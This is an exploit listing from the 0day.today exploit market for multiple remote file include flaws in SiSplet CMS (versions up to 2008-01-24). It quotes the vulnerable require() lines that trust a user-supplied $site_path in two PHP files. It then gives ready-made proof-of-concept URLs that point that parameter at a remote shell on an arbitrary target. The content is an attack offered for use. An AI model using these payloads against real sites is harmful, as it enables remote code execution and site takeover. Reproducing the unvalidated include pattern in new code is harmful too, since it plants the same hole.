[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SiSplet CMS <= 2008-01-24 Multiple Remote File Include Exploit

Author
cr4wl3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10116
Category
web applications
Date add
07-12-2009
Platform
unsorted
==============================================================
SiSplet CMS <= 2008-01-24 Multiple Remote File Include Exploit
==============================================================

########################################################################
#SiSplet CMS <= 2008-01-24 Multiple Remote File Include Exploit
########################################################################
 
########################################################################
3rr0r 1: ./SiSplet-2008-01-24/main/anketa/new.php (line 3)
 
       <?php
           require_once($site_path.'main/anketa/class.php');
       ?>
 
3rr0r 2: ./SiSplet-2008-01-24/main/forum/komentar.php (line 3)
 
       <?php
           require($site_path.'main/forum/class.php');
       ?>
########################################################################
 
########################################################################
PoC  :   http://[target]/[path]/main/anketa/new.php?site_path=[Shell]
         http://[target]/[path]/main/forum/komentar.php?site_path=[Shell]
########################################################################
 
########################################################################



#  0day.today [2024-11-15]  #